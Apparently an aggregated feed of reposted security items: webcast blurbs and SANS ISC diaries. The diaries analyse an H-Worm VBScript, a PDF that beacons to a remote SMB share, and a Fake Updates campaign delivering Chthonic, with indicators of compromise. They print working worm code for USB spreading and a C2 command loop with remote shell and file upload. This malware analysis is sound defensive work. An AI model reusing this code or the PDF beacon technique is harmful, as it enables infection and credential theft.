This post was originally published on this site

Speakers: Kelly Brazil

Application security is undergoing a broad transformation. From the way applications are architected, developed and deployed to the ever-evolving diversity and scale of the threats they face. Driving this transformation is the growing complexity of application portfolios, which are providing more engaging experiences for customers but are also housing increasingly more data. Simply put, legacy, rules-based web application firewalls (WAFs) like F5 and Imperva Incapsula are not equipped to keep pace with todays dynamic application and threat environments. Security teams need the right tools and strategies built for these new realities. Enter, the next-gen WAF.

But whats so different about a next-gen WAF? Is it merely a buzzword? In this webcast, we will take a practical look at the next-gen WAF by showing how it differs from traditional WAFs and how it tackles some of the trickiest problems in AppSec today, including:

• How to deliver highly accurate, real-time app protection without burdensome signatures or tuning
• Incorporating attacker-centric techniques that match today’s threat landscape, including active interrogation and deception
• Stopping bots and malicious automation
• How to quickly and effectively extend security to APIs and microservice architectures
• Building security that automatically mirrors the speed and scale of DevOps without losing control
• Defending against website defacement attacks

Join us for this 45-minute session to see how modern AppSec tools can tackle modern AppSec problems.

This post was originally published on this site

Speakers: Robert M. Lee, Tim Conway

Join Robert M. Lee and Tim Conway as they discuss and highlight upcoming ICS talks and exciting networking opportunities at the SANS ICS Security Summit 2019. Now in its 14th year, the annual ICS Security Summit brings together practitioners and leading experts to share ideas, methods, and techniques for defending control system environments. In-depth presentations and interactive panel discussions deliver real-world approaches that work and make a difference for the individuals fighting this fight every day.

The ICS Security Summit will address a wide range of topics, including:

• Understanding what an attack against your organization will look like (deconstructing real-world ICS attacks and technical threats)
• Live attack demonstrations & the defenses needed to stop them
• Case studies and success stories
• System and organizational investment opportunities that reduce attacker effects
• Future attack vectors on ICS
• Mitigations – Defenders, governance, and controls

Learn More

This post was originally published on this site

Ever wonder just how much information is publicly available about you? Ever wonder how cyber criminals harvest information and customize attacks for their victims. The technique is called Open Source Intelligence (OSINT) and it is far simpler and more powerful than you think.

This post was originally published on this site

Another piece of malicious code spotted on GitHub this time. By the way, this is the perfect example to demonstrate that protecting users via a proxy with web-categorization is useless… Event sites from the Alexa Top-1M may deliver malicious content (Github current position is 51[1]). The URL has been found in a classic email phishing attempt. The content was recently uploaded (<24h) when I found it:

hxxps://raw.githubusercontent[.]com/sidilig/sharing/ebk-ci/Ebanking.zip

Let’s have a look at the archive content:

ISC $ shasum -a 256 Ebanking.zip
abb244010410ce6012bac9e4fc902432cfebe06724d014c63d9ef21f0a6b8b78  Ebanking.zip
ISC $ unzip -t Ebanking.zip
Archive:  Ebanking.zip
    testing: Mesures de sécurité.jar   OK
    testing: Habilitations Ebank.vbs   OK
No errors detected in compressed data of Ebanking.zip.
ISC $ shasum -a 256 *
d4ffa2acdec66f15c2252f36311c059ab00cc942b7cb54c33b4257dbc680ed9b  Habilitations Ebank.vbs
7ab54cb93a4a76dd5578f0b0ddcaeb8420311ebb39f27b62e535a43aec02523a  Mesures de sécurité.jar

Let’s have a look at the VBScript code. It’s based on a big class:

Class Values
   ...
End Class
Set myClass = new Values
myClass.Start()

Most part of the code is obfuscated using a simple technique: A chunk of Base64 data is decoded by replacing a set of characters with the letter ‘A’:

Private Function peter_paul(sand, way_off)
  Dim stapler, hp_pc, pillow, ruben
  stapler = "!@"
  hp_pc = "A"
  pillow = "Q29uc3QgVHlw....."
  ruben = Replace(pillow, stapler, hp_pc)
  peter_paul = b642byt_arr(1, ruben, 10)
End Function

Easy to decode with Cyberchef:

The decoded data is a new script. The next step is to execute it::

Public Sub Start()
  Set yhm_pepe = CreateObject("ADODB.Stream")
  Set spike = CreateObject("Microsoft.XMLDOM")
  If john_conor(1, peter_paul(0, False)) = ojor Then
    ExecuteGlobal ojor
  End If
End Sub

The code is simply written to the ADODB.Stream then executed. Here is what the second stage does. It copies itself for persistence in %TEMP%tGcuACWROu.vbs then install . An interesting behaviour: it scans for available removable drives (drive.type == 1)[2] and infect them:

for each drive in filesystemobj.drives
  if  drive.isready = true then
    if  drive.freespace  > 0 then
      if  drive.drivetype  = 1 then
        filesystemobj.copyfile wscript.scriptfullname , drive.path & "" & installname,true
        if  filesystemobj.fileexists (drive.path & "" & installname)  then
          filesystemobj.getfile(drive.path & ""  & installname).attributes = 2+4
        end if
        for each file in filesystemobj.getfolder( drive.path & "" ).Files
          if not lnkfile then exit for
            if  instr (file.name,".") then
              if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                  filename = split(file.name,".")
                  set lnkobj = shellobj.createshortcut (drive.path & ""&filename (0)&".lnk")
                  lnkobj.windowstyle = 7
                  lnkobj.targetpath = "cmd.exe"
                  lnkobj.workingdirectory = ""
                  lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ",     chrw(34) & " " & chrw(34)) &"&exit"
                   filleicon = shellobj.regread ("HKEY_LOCAL_MACHINEsoftwareclasses" & shellobj.regread ("HKEY_LOCAL_MACHINEsoftwareclasses." &     split(file.name, ".")(ubound(split(file.name, ".")))& "") & "defaulticon")
                   if  instr (fileicon,",") = 0 then
                     lnkobj.iconlocation = file.path
                   else
                     lnkobj.iconlocation = fileicon
                   end if
                   lnkobj.save()
                 end if
               end if
             end if
           next

When the installation is successful, it starts to communicate with the C2 server:  hxxp://ghanaandco.sytes[.]net:3007.

POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: fr-be
User-Agent: 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019
Accept-Encoding: gzip, deflate
Host: ghanaandco.sytes.net:3007
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Here is a reply from the C2 server:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 12
Server: Indy/9.0.18

sleep<|>5000

Here is the main loop waiting for commands:

while true
  install
  response = ""
  response = post ("is-ready","")
  cmd = split (response,spliter)
  select case cmd (0)
    case "excecute"
      param = cmd (1)
      execute param
    case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
    case "uninstall"
      uninstall
    case "send"
      download cmd (1),cmd (2)
    case "site-send"
      sitedownloader cmd (1),cmd (2)
    case "recv"
      param = cmd (1)
      upload (param)
    case  "enum-driver"
       post "is-enum-driver",enumdriver
     case  "enum-faf"
       param = cmd (1)
       post "is-enum-faf",enumfaf (param)
     case  "enum-process"
       post "is-enum-process",enumprocess
     case  "cmd-shell"
       param = cmd (1)
       post "is-cmd-shell",cmdshell (param)
     case  "delete"
        param = cmd (1)
        deletefaf (param)
      case  "exit-process"
        param = cmd (1)
        exitprocess (param)
      case  "sleep"
        param = cmd (1)
        sleep = eval (param)
    end select
  wscript.sleep sleep
wend

If the delivery method changed, the malicious code is not new. This is a good old H-Worm as already found in 2013[3]. Old stuff but still used in the wild!

[1] https://www.alexa.com/siteinfo/github.com
[2] https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/drivetype-property
[3] https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Yesterday I stumbled upon a PDF file that was flagged as suspicious by a customer’s anti-malware solution and placed in the quarantine. Later, the recipient contacted the team in charge of emails to access his document because he knew the sender and pretended that the file was legit.

The file looked indeed safe and the content was properly related to the customer’s business. I did a quick analysis of the file in my sanbox and, once the file opened, Acrobat Reader attempted to connect to a remote SMB share. I extracted objects from the PDF file and there was indeed a reference to a SMB share. When you ask a computer to connect to such a service, you immediately think about NTLM hashes leak.

Here is the object extracted from the PDF:

obj 10 0
 Type: /Page
 Referencing: 9 0 R, 6 0 R, 11 0 R, 12 0 R, 13 0 R, 7 0 R, 2 0 R, 14 0 R, 1 0 R, 15 0 R, 16 0 R, 17 0 R, 18 0 R, 3 0 R, 19 0 R, 20 0 R

  <<
    /AA
      <<
        /O
          <<
            /F '(\virtualofficestorage[.]comdocs_share)'
            /D [ 0 /Fit]
            /S /GoToE
          >>
      >>
    /Parent 9 0 R
    /Contents [6 0 R 11 0 R 12 0 R 13 0 R 7 0 R]
    /Type /Page
    /Resources
      <<
        /ExtGState
          <<
            /Xi1 2 0 R
          >>
        /XObject
          <<
            /BG0 14 0 R
            /Xi0 1 0 R
            /CL 15 0 R
          >>
        /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
        /Font
          <<
            /F_2 16 0 R
            /F_0 17 0 R
            /F_1 18 0 R
            /Xi2 3 0 R
          >>
      >>
    /MediaBox [0 -0.02000 598.80 844.08]
    /Annots [19 0 R 20 0 R]
  >>

The domain virtualofficestorage[.]com[1] resolves to %%ip:185.225.17.98%%, located in Romania. Shodan reports indeed a SMB share:

Helas, it does not reply anymore (last seen on 2019-02-03). There is a website running on this domain, it serves the default Ubuntu Apache welcome page. 

I can’t share the file not the hash but did you notice the same behavious with other PDF documents? Do you know more about this domain? (VT has only one reference to the same kind of document[2])
Please share!

[1] https://www.virustotal.com/#/domain/virtualofficestorage.com
[2] https://www.virustotal.com/#/file/746794ca49f497b43eb53a2fb25c4a0b3782002a45f498c047fa07d46cd43592/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Introduction

Last week on 2019-02-06, @baberpervez2 tweeted about a compromised website used by the Fake Updates campaign (link to tweet).  The Fake Updates campaign uses compromised websites that generate traffic to a fake update page.  The type of fake update page depends on your web browser.  Victims would see a fake Flash update page when using Internet Explorer, a fake Chrome update page when using Google Chrome, or a fake Firefox update page when using Firefox.  Victims download JavaScript (.js) files from these pages disguised as browser updates.  The downloaded .js files will instead install malware on a vulnerable Windows host.

Patterns for infection traffic are relatively unchanged since this campaign was first reported on the Malwarebytes blog in April 2018.

I generated an infection from the Fake Updates campaign on Friday 2019-02-09 and again on Monday 2019-02-11.  Both times, the final payload was a Chthonic banking Trojan.  Today’s diary reviews the infection I generated on Monday 2019-02-11.

Shown above:  Flow chart for infection traffic from Monday 2019-02-11.

Screenshots

The following ar screenshots on Fake Updates campaign traffic I generated from the inital compromised website at thetechhaus[.]com.

Shown above:  Fake Chrome update page seen when thetechhaus[.]com was viewed in the Chrome web browser.

Shown above:  You can ignore warnings, download, and run the malicious .js file on a vulnerable Windows host.

Shown above:  The .js file shows highly-obfuscated script, which has always been the case for files from this campaign.

Shown above:  Start of the infection chain traffic filtered in Wireshark.

Shown above: Redirect traffic to track.positiverefreshment[.]org that pointed to fake Chrome update page.

Shown above:  Traffic for fake Chrome update page on 3aak.gotguardsecurity[.]com.

Shown above: HTTPS traffic to dl.dropboxusercontent.com that returned a malicious .js file.

Shown above:  Traffic after running the .js file disguised as a Chrome update.

Shown above:  Final payload (Chthonic banking Trojan) persistent on the infected Windows host.

Indicators of Compromise (IoCs)

The following are indicators associated with the infection on Monday 2019-02-11.

Initial compromised site:

• thetechhaus[.]com

Redirect that led to fake Chrome update page:

• 81.4.122[.]193 port 80 – track.positiverefreshment[.]org – GET /s_code.js?[3 requests with different strings of characters]

Traffic for fake Chrome update page:

• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/css.css
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome.min.css
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome_logo_2x.png
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome-new.jpg
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/k3k702ZOKiLJc3WVjuplzOgdm0LZdjqr5-oayXSOefg.woff2
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/cJZKeOuBrn4kERxqtaUH3VtXRa8TVwTICgirnJhmVJw.woff2
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/DXI1ORHCpsQm3Vp6mXoaTegdm0LZdjqr5-oayXSOefg.woff2
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/MTP_ySUJH_bn48VBG8sNSugdm0LZdjqr5-oayXSOefg.woff2
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome-32.png
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=1
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=2
• 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=3

• Note: each time I saw a fake update page, the IP address was the same, but the domain was always different.

Download of .js file disguised as Chrome update:

• port 443 – dl.dropboxusercontent.com – HTTPS traffic

Traffic generated by .js file:

• 188.165.62[.]40 port 80 – 6145fab0.static.spillpalletonline[.]com – POST /pixel.gif
• 188.165.62[.]40 port 80 – 6145fab0.static.spillpalletonline[.]com – POST /pixel.gif?ss&ss1img

• Note: The above domains were also different for each infection.

Post-infection traffic caused by Chthonic banking Trojan:

• [infected lab host restarted twice]
• various IP addresses over TCP port 53 – DNS queries for afroamericanec[.]bit
• 185.229.224[.]120 port 80 – afroamericanec[.]bit – POST /en/
• 185.229.224[.]120 port 80 – afroamericanec[.]bit – POST /en/www/

Associated malware:

SHA256 hash: 9daa0dec909874316afe7f402e82d408b96b215a3501579849c792ec91cfe750

• File size: 41,696 bytes
• File name: Chrome_77.35.js
• File description: malicious .js file returned from dl.dropboxusercontent.com

SHA256 hash: 4a17789f8a03fb2ec3185322ab879d436470d931e1fb98d0a4b9e5b68cda95ab

• File size: 406,792 bytes
• File location: C:Users[username]AppDataLocalTempChrome_77.35.exe
• File description: Second executable dropped to the infected Windows host (Chthonic)

SHA256 hash: 7356424e04f730c7440f76cd822ff8645693b9835ae6aec4d6840cb1becae45c

• File size: 406,792 bytes
• File location: C:Users[username]AppDataRoamingYCommonFilesYCommonFiles.com (random names for directory and file name pair)
• File description: Chthonic executable persistent on the infected Windows host.

Final words

Monday’s infection was unusual, because everything except for the dropbox URL was regular HTTP traffic.  I more often find HTTPS traffic from the compromised site, redirect traffic, and fake update page.  Usually the only HTTP traffic is generated by the downloaded .js file and final malware payload.

Pcap and malware samples for today’s diary can be found here.

—
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.